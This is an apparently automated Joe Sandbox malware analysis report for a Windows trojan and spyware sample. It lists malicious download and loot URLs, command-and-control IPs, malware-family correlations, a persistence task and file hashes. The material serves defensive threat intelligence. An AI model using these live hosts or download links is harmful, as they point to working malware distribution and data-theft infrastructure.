                  http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedMon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://hsiens.xyz/setup_installer.exe, 00000001.00000003.1691383572.000000000352D000.00000004.00001000.00020000.00000000.sdmp, setup_install.exe, 00000002.00000002.1969066359.0000000000880000.00000004.00000020.00020000.00000000.sdmp, setup_install.exe, 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp, setup_install.exe.1.drfalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionOpenVPNMon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 
0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://ip-api.com:80/json/Mon17c604381c7047e.exe, 00000013.00000002.1988739257.000002D9EF55F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://45.9.20.13/partner/loot.php?pub=mixoneG:Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressingMon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionDefendersLRMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 
0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://t.gogamec.com:443/2302/sqlite.dats://t.gogamec.com/2302/sqlite.datMon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpfalse
IP               | Domain             | Country            | ASN    | ASN Name          | Malicious
188.40.141.211   | gmpeople.com       | Germany            | 24940  | HETZNER-ASDE      | true
172.67.133.215   | wfsdragon.ru       | United States      | 13335  | CLOUDFLARENETUS   | false
45.133.1.107     | unknown            | Netherlands        | 35913  | DEDIPATH-LLCUS    | false
162.159.133.233  | unknown            | United States      | 13335  | CLOUDFLARENETUS   | false
45.142.215.47    | unknown            | Russian Federation | 202933 | CLOUDSOLUTIONSRU  | true
172.67.132.113   | iplogger.org       | United States      | 13335  | CLOUDFLARENETUS   | false
208.95.112.1     | ip-api.com         | United States      | 53334  | TUT-ASUS          | false
162.159.130.233  | cdn.discordapp.com | United States      | 13335  | CLOUDFLARENETUS   | false
172.67.19.24     | pastebin.com       | United States      | 13335  | CLOUDFLARENETUS   | true
45.9.20.13       | unknown            | Russian Federation | 35913  | DEDIPATH-LLCUS    | true
135.181.129.119  | unknown            | Germany            | 24940  | HETZNER-ASDE      | true
51.178.186.149   | unknown            | France             | 16276  | OVHFR             | false
IP
127.0.0.1
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1496480
Start date and time: 2024-08-21 10:56:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 14m 57s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 61
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@94/64@66/13
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 205
• Number of non-executed functions: 229
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): WerFault.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 2.18.97.153, 20.189.173.21
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net
• Not all processes were analyzed; report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
04:57:07 | API Interceptor | 14x Sleep call for process: powershell.exe modified
04:57:09 | API Interceptor | 145x Sleep call for process: Mon17c604381c7047e.exe modified
04:57:10 | API Interceptor | 4027x Sleep call for process: Mon17742f90b916675f2.exe modified
04:57:12 | API Interceptor | 17x Sleep call for process: Mon1795d04d4bd.exe modified
04:57:14 | API Interceptor | 3x Sleep call for process: svchost.exe modified
04:57:15 | API Interceptor | 1289951x Sleep call for process: Mon178817e243.exe modified
04:57:18 | API Interceptor | 1890x Sleep call for process: explorer.exe modified
04:57:24 | API Interceptor | 1368312x Sleep call for process: Mon1785436ae78.exe modified
04:57:27 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
04:57:36 | API Interceptor | 74x Sleep call for process: Mon17b5f403be4d8d6b.exe modified
09:57:48 | Task Scheduler | Run new task: Firefox Default Browser Agent 116A150CA183DEAE path: C:\Users\user\AppData\Roaming\bgjifes
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 188.40.141.211
  vwaoMjcyAw.exe | malicious | SmokeLoader | selebration17io.io/index.php
  Qi4Mj8hG3t.exe | malicious | SmokeLoader | selebration17io.io/index.php
  br0A8E2X6I.exe | malicious | SmokeLoader | selebration17io.io/index.php
  setup.exe | malicious | Babuk, Djvu | zexeq.com/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true
  SecuriteInfo.com.Win32.Evo-gen.21074.1738.exe | malicious | SmokeLoader | agressivemnaiq.xyz/
  A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exe | malicious | Bdaejec, SmokeLoader | host-data-coin-11.com/
  be1c79275d836696a00b258d15a8b337a8c9beb8198a5bd3d5aaf64d660c8005_dump.exe | malicious | SmokeLoader | host-data-coin-11.com/
  EF2D1DE8BE7B216F6983BD43D120B512A0917EBE887F30D256ECA8395CE613CC.exe | malicious | Bdaejec, SmokeLoader | host-data-coin-11.com/
  LisectAVT_2403002B_303.exe | malicious | Bdaejec, SmokeLoader | aucmoney.com/upload/
  LisectAVT_2403002C_47.exe | malicious | SmokeLoader | trad-einmyus.com/index.php
Match: 172.67.133.215
  611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | malicious | Bdaejec, PrivateLoader | wfsdragon.ru/api/setStats.php
  sotema_5.txt.exe | malicious | Amadey, Fabookie, ManusCrypt, Nymaim, PrivateLoader, Raccoon Stealer v2, RedLine | wfsdragon.ru/api/setStats.php
  Trojan-PSW.Win32.Racealer.lly-e47bfa7b58706ed.exe | malicious | Amadey, FFDroider, ManusCrypt, Nitol, PrivateLoader, Raccoon Stealer v2, RedLine | wfsdragon.ru/api/setStats.php
  HEUR-Trojan-Spy.Win32.Fbkatz.gen-cfc689df6491.exe | malicious | Amadey, CryptOne, ManusCrypt, Nymaim, PrivateLoader, RedLine, Tofsee | wfsdragon.ru/api/setStats.php
  16F1F5B4DE94BC49205E1CDD8ADB3B4ED2C482952CA07.exe | malicious | PrivateLoader | /api/setStats.php
  65341B1F7F4018E163E564B546012D5BFA41A70C9B992.exe | malicious | PrivateLoader, RedLine, Vidar | wfsdragon.ru/api/setStats.php
  oslXRFLiaD.exe | malicious | PrivateLoader | wfsdragon.ru/api/setStats.php
  15F4E965344A38B07713363133E6624F72DB10CB29796.exe | malicious | RedLine Vidar | wfsdragon.ru/api/setStats.php
  3D898349908143BEF8F7652DADA13C6075F84AF469349.exe | malicious | RedLine Vidar | wfsdragon.ru/api/setStats.php
  47E9B75457446A3B3C86622DD282065B0F88603E2C009.exe | malicious | SmokeLoader Vidar | wfsdragon.ru/api/setStats.php
Match: 45.133.1.107
  33CBD9E39DD39A84D0426897605B17000046E0FB14399.exe | malicious | Backstage Stealer RedLine Vidar | 45.133.1.107/download/NiceProcessX64.bmp
  iCm814vnxp.exe | malicious | Unknown | 45.133.1.107/download/NiceProcessX64.bmp
  kOwtqMS5Yn.exe | malicious | Unknown | 45.133.1.107/download/NiceProcessX64.bmp
  423ADCAA5B1076A3871837BCFC61177CDDEC9C5F30E34.exe | malicious | Backstage Stealer RedLine SmokeLoader Socelars Vidar | 45.133.1.107/download/NiceProcessX64.bmp
  71A117DE440384FDC4B8FB690FC73674E9E2A9A75E689.exe | malicious | Backstage Stealer SmokeLoader Vidar Xmrig | 45.133.1.107/download/NiceProcessX64.bmp
  593D376336BB37228ECD2B7C5D46A2EF965C04F33DF04.exe | malicious | RedLine SmokeLoader Socelars Vidar | 45.133.1.107/download/NiceProcessX64.bmp
  HxV2jjWxxh.exe | malicious | Cyberduck Metasploit Raccoon RedLine Socelars | 45.133.1.107/server.txt
  FC2E04D392AB5E508FDF6C90CE456BFD0AF6DEF1F10A2.exe | malicious | SmokeLoader Vidar | 45.133.1.107/download/NiceProcessX64.bmp
  365F984ABE68DDD398D7B749FB0E69B0F29DAF86F0E3E.exe | malicious | Cryptbot RedLine SmokeLoader Vidar | 45.133.1.107/download/NiceProcessX64.bmp
  Setup.exe | malicious | Unknown | 45.133.1.107/download/NiceProcessX64.bmp
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: cdn.discordapp.com
  3QKcKCEzYP.exe | malicious | LummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBC | 162.159.130.233
  ExeFile (274).exe | malicious | Unknown | 162.159.135.233
  ExeFile (308).exe | malicious | Unknown | 162.159.134.233
  ExeFile (308).exe | malicious | Unknown | 162.159.129.233
  sz4ypfkelT.exe | malicious | Unknown | 162.159.133.233
  sz4ypfkelT.exe | malicious | Unknown | 162.159.134.233
  BALANCE PAYMENT.exe | malicious | Unknown | 162.159.129.233
  BALANCE PAYMENT.exe | malicious | Unknown | 162.159.134.233
  27256APPROVEDACHpmt187023OI2783764.js | malicious | Unknown | 162.159.134.233
  Monolith.exe | malicious | Unknown | 162.159.133.233
Match: gmpeople.com
  2slaGlhJoL.exe | malicious | SmokeLoader | 190.117.75.91
  493DE296E5AE30DAADF0DC5A1BF4FBFEA1BD43D3214FF.exe | malicious | RedLine SmokeLoader | 187.212.183.165
  vFwls6qRX1.exe | malicious | RedLine SmokeLoader | 190.117.75.91
  49jocxDxyP.exe | malicious | SmokeLoader | 186.6.254.27
  SecuriteInfo.com.Trojan.GenericKDZ.78846.28607.exe | malicious | RedLine SmokeLoader | 210.207.244.101
  kT6IWKR2ET.exe | malicious | RedLine SmokeLoader | 189.165.94.67
  fzASFoaCaK.exe | malicious | RedLine SmokeLoader | 118.33.109.122
  JhROG8i5AG.exe | malicious | RedLine SmokeLoader | 89.133.230.171
  v5Kb9IsTrk.exe | malicious | RedLine SmokeLoader | 186.6.254.27
  57o19c6gH9.exe | malicious | RedLine SmokeLoader | 177.206.228.123
Match: ip-api.com
  Orden de Compra No. 00501.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
  Order39058174.exe | malicious | AgentTesla | 208.95.112.1
  file.exe | malicious | Nightingale Stealer | 208.95.112.1
  fkgDa.scr.exe | malicious | Blank Grabber, Umbral Stealer | 208.95.112.1
  rnZ46.scr.exe | malicious | Blank Grabber, Umbral Stealer | 208.95.112.1
  LzIoc.scr.exe | malicious | Blank Grabber, Umbral Stealer | 208.95.112.1
  Payment-Details.scr.exe | malicious | AgentTesla | 208.95.112.1
  ExeFile (275).exe | malicious | Quasar | 208.95.112.1
  ExeFile (351).exe | malicious | Quasar | 208.95.112.1
  ExeFile (206).exe | malicious | RMSRemoteAdmin, Xmrig | 208.95.112.1
Match: iplogger.org
  ExeFile (331).exe | malicious | Unknown | 172.67.132.113
  ExeFile (71).exe | malicious | Unknown | 172.67.132.113
  ExeFile (206).exe | malicious | RMSRemoteAdmin, Xmrig | 104.21.4.208
  cheat_roblox.exe | malicious | XWorm | 172.67.132.113
  roblox cheat.exe | malicious | XWorm | 104.21.4.208
  cheat_roblox.exe | malicious | XWorm | 104.21.4.208
  roblox cheat.exe | malicious | XWorm | 172.67.132.113
  FEB32B614BC7F38CC0B553B5FEE80B7E68AD8AE78DF1F1CAE4016A5AA1C4677A.exe | malicious | Bdaejec | 172.67.132.113
  B111141595018D6980A609315F572F827D7FA913454A785EEBC7376019ECE195.exe | malicious | Bdaejec | 104.21.4.208
  65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe | malicious | Bdaejec, Socelars | 172.67.132.113
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: HETZNER-ASDE
  PurchaseOrder849393.vbs | malicious | Remcos | 135.181.213.52
  17dDkWbjoz.exe | malicious | PureLog Stealer | 159.69.63.226
  hDlOQhHBlY.exe | malicious | Unknown | 148.251.191.252
  vwaoMjcyAw.exe | malicious | SmokeLoader | 188.40.141.211
  Qi4Mj8hG3t.exe | malicious | SmokeLoader | 188.40.141.211
  br0A8E2X6I.exe | malicious | SmokeLoader | 188.40.141.211
  53QoH91Zg3.exe | malicious | Unknown | 88.99.2.111
  7GfciIf7ys.exe | malicious | Unknown | 213.239.213.220
  2pFytt52ws.exe | malicious | Unknown | 95.216.22.24
  53QoH91Zg3.exe | malicious | Unknown | 195.201.62.78
Match: CLOUDFLARENETUS
  7CTH165fQv.exe | malicious | Latrodectus | 104.26.8.59
  PO5244500482.docx.doc | malicious | Remcos | 188.114.97.3
  ORDER CFC.docx.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
  https://lvltechnologies.freshdesk.com/en/support/solutions/articles/153000195870-auftragsbest%C3%A4tigung-31395-vom-14-08-2024 | malicious | Unknown | 104.21.50.204
  https://lvltechnologies.freshdesk.com/en/support/solutions/articles/153000195870-auftragsbest%C3%A4tigung-31395-vom-14-08-2024 | malicious | Unknown | 172.64.154.146
  MTWE UNTITLED.xls | malicious | Unknown | 188.114.97.3
  RFQ.xls | malicious | Remcos | 188.114.96.3
  MTWE UNTITLED.xls | malicious | Unknown | 188.114.96.3
  Purchase Inquiry.xla.xlsx | malicious | Unknown | 188.114.97.3
  PO20082024oman.xls | malicious | Remcos | 188.114.97.3
Match: DEDIPATH-LLCUS
  Quotation PO 11109.pdf.exe | malicious | AsyncRAT, PureLog Stealer | 45.83.140.79
  botx.mpsl.elf | malicious | Mirai | 171.22.122.239
  3AV1PyEQ16.elf | malicious | Unknown | 45.86.65.41
  Final Shipping Documents_pdf.exe | malicious | FormBook | 178.212.35.248
  Final Shipping Document.exe | malicious | FormBook | 178.212.35.248
  New Order#9.exe | malicious | FormBook | 178.212.35.248
  LisectAVT_2403002C_83.exe | malicious | RedLine | 45.9.20.20
  PO#O_0140724.exe | malicious | FormBook | 178.212.35.248
  4qOdQ3lrYx.elf | malicious | Mirai | 45.12.141.80
  Update.js | malicious | SocGholish | 45.83.31.54
Match: CLOUDFLARENETUS
  7CTH165fQv.exe | malicious | Latrodectus | 104.26.8.59
  PO5244500482.docx.doc | malicious | Remcos | 188.114.97.3
  ORDER CFC.docx.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
  https://lvltechnologies.freshdesk.com/en/support/solutions/articles/153000195870-auftragsbest%C3%A4tigung-31395-vom-14-08-2024 | malicious | Unknown | 104.21.50.204
  https://lvltechnologies.freshdesk.com/en/support/solutions/articles/153000195870-auftragsbest%C3%A4tigung-31395-vom-14-08-2024 | malicious | Unknown | 172.64.154.146
  MTWE UNTITLED.xls | malicious | Unknown | 188.114.97.3
  RFQ.xls | malicious | Remcos | 188.114.96.3
  MTWE UNTITLED.xls | malicious | Unknown | 188.114.96.3
  Purchase Inquiry.xla.xlsx | malicious | Unknown | 188.114.97.3
  PO20082024oman.xls | malicious | Remcos | 188.114.97.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 54328bd36c14bd82ddaa0c04b25ed9ad
  DHL Shipping Document_308-4716.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 172.67.132.113
  dhl awb_Ref 266464606_009347280261.AWB.PEK.CO.227.20200507.230751 .exe | malicious | Snake Keylogger | 172.67.132.113
  Reporte de emisi#U00f3n de documentos (Compras).exe | malicious | Snake Keylogger | 172.67.132.113
  QUOTATION_AUGQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 172.67.132.113
  ioqjWeKazzLuiTHfd.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | 172.67.132.113
  Turkiye Is bankasi_#U0130#U015eLEM #U00d6ZET#U0130_11055699-1034 nolu TICARI 28.05.2024.exe | malicious | PureLog Stealer, Snake Keylogger | 172.67.132.113
  New PO pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 172.67.132.113
  8468281651.exe | malicious | PureLog Stealer, Snake Keylogger | 172.67.132.113
  ExeFile (315).exe | malicious | Unknown | 172.67.132.113
  ExeFile (315).exe | malicious | Unknown | 172.67.132.113
Match: 3b5074b1b5d032e5620f69f9f700ff0e
  gmx.bat | malicious | Unknown | 162.159.130.233
  Order39058174.exe | malicious | AgentTesla | 162.159.130.233
  1724226659ad3c86adf90ead8e85be00ee17653b242dddaf7b133397ec2c8c708c9397b763517.dat-decoded.exe | malicious | Remcos | 162.159.130.233
  http://qemailserver.com | malicious | Unknown | 162.159.130.233
  7aHn0kxDWZ.exe | malicious | Xmrig | 162.159.130.233
  Order39058174.exe | malicious | Unknown | 162.159.130.233
  DHL Shipping Document_308-4716.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 162.159.130.233
  dhl awb_Ref 266464606_009347280261.AWB.PEK.CO.227.20200507.230751 .exe | malicious | Snake Keylogger | 162.159.130.233
  QUOTATION_AUGQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 162.159.130.233
  ibww.hta | malicious | Cobalt Strike, Remcos | 162.159.130.233
Match: a0e9f5d64349fb13191bc781f81f42e1
  7CTH165fQv.exe | malicious | Latrodectus | 172.67.19.24
  MTWE UNTITLED.xls | malicious | Unknown | 172.67.19.24
  Purchase Inquiry.xla.xlsx | malicious | Unknown | 172.67.19.24
  air_way_bill_Dhl_invoice_bl_pl_21_08_2024_00000000.xls | malicious | Unknown | 172.67.19.24
  QjByMeS8sj.exe | malicious | LummaC | 172.67.19.24
  QjByMeS8sj.exe | malicious | LummaC | 172.67.19.24
  LOd44dCAaK.exe | malicious | LummaC | 172.67.19.24
  3QKcKCEzYP.exe | malicious | LummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBC | 172.67.19.24
  https://doc.clickup.com/9014542322/d/h/8cmxzzj-434/d3ec30ee79aa63a | malicious | HTMLPhisher | 172.67.19.24
  Setup.exe | malicious | LummaC, Go Injector, LummaC Stealer | 172.67.19.24
Match | Associated Sample Name / URL | Detection | Threat Name
Match: C:\Users\user\AppData\Local\Temp\09xU.exE
  67A38378609C0EB8141A74E7BAA052B01FF5734319B4E.exe | malicious | CryptOne, Nymaim, PrivateLoader, RedLine, SmokeLoader, onlyLogger
  582BD655F491FE76A95B9C8900A3051D379DCBB86036F.exe | malicious | Nymaim, RedLine, Socelars, onlyLogger
  E4FB39B3F6AA19028CCDD531437E7994A9B6F62B317AD.exe | malicious | Nymaim, RedLine, Socelars, onlyLogger
  6AA0D341CEE633C2783960687C79D951BF270924DF527.exe | malicious | ManusCrypt, Nymaim, RedLine, SmokeLoader, Socelars, Vidar, onlyLogger
  F06154D372FA1CD4D5E9C1D5956646C9B4DD80DAB46AB.exe | malicious | Nymaim, RedLine, SmokeLoader, Socelars, onlyLogger
  7287980C1AFB840A7438471126C0C95C36FEFA79A013F.exe | malicious | Nymaim, PrivateLoader, RedLine, Socelars, onlyLogger
  CFCAB36F73560B2D15B6C266FEAAF0195A6E0D18C22AA.exe | malicious | Nymaim, RedLine, Socelars, Vidar, onlyLogger
  822EE6C4B4BB9A619985E83C04A2DFE1A09152DC0276B.exe | malicious | Nymaim, PrivateLoader, RedLine, Socelars, Vidar, onlyLogger
  ZErNFYRzCC.exe | malicious | Nymaim, RedLine, Socelars, onlyLogger
  84B3387D512191B0764FDE9A03D827CB42FFE33D864B1.exe | malicious | Cookie Stealer RedLine SmokeLoader Socelars onlyLogger
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):8192
                                      Entropy (8bit):0.363788168458258
                                      Encrypted:false
                                      SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                      MD5:0E72F896C84F1457C62C0E20338FAC0D
                                      SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                      SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                      SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                      Malicious:false
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):1310720
                                      Entropy (8bit):1.3107657764199447
                                      Encrypted:false
                                      SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrZ:KooCEYhgYEL0In
                                      MD5:0B60E38DE6856BBB7B0024B853BC8935
                                      SHA1:53097C3EE9F4B1183A69DDD01DD7EB548BC74916
                                      SHA-256:B41A01AC5FEC041ED5F3509C64CB7F8573B5BB61539056889A125030D25152E1
                                      SHA-512:E0456EC1CF0BF35B5A2B197A8F65598A3E2161D40BCB72938C889B408433BA251F0CE0C6A703592C88ECED48CFF0E3D78CFDD15B8DCCEB2F9B17736A78FE9746
                                      Malicious:false
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xab2e23b3, page size 16384, Windows version 10.0
                                      Category:dropped
                                      Size (bytes):1310720
                                      Entropy (8bit):0.4221021482395999
                                      Encrypted:false
                                      SSDEEP:1536:/SB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:/azag03A2UrzJDO
                                      MD5:6856326A015A08C6B6EFB6F8E74EBFF6
                                      SHA1:A4183CFACCE90982ACBBCDF891D1E96A966FAD64
                                      SHA-256:CF2F493463870D8E52B5B803739B9C44CD08A4C4FCFFDF5AEEB27FEBFCD9199F
                                      SHA-512:F23559E893A3A7F5252CA15B6B14C795D461A4328360D0EE20B23D4372F3F2D6036B8276FB8F3D4523EDBC27FB88AE460EDF8197B381614170DD0E7D5D4A00A8
                                      Malicious:false
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):16384
                                      Entropy (8bit):0.07539157175901075
                                      Encrypted:false
                                      SSDEEP:3:mfSVetYecbZK7RtElHZMlRrKz/jsYZQltGZlRWlYllOE/tlnl+/rTc:mrzJ7RtElHZMlRrKz4YZQl8bRWlIpMP
                                      MD5:B6327E7E56E970E568DA555F5EA791B5
                                      SHA1:9B8DACCACC0FD19345047B7969D38BA23429ADE9
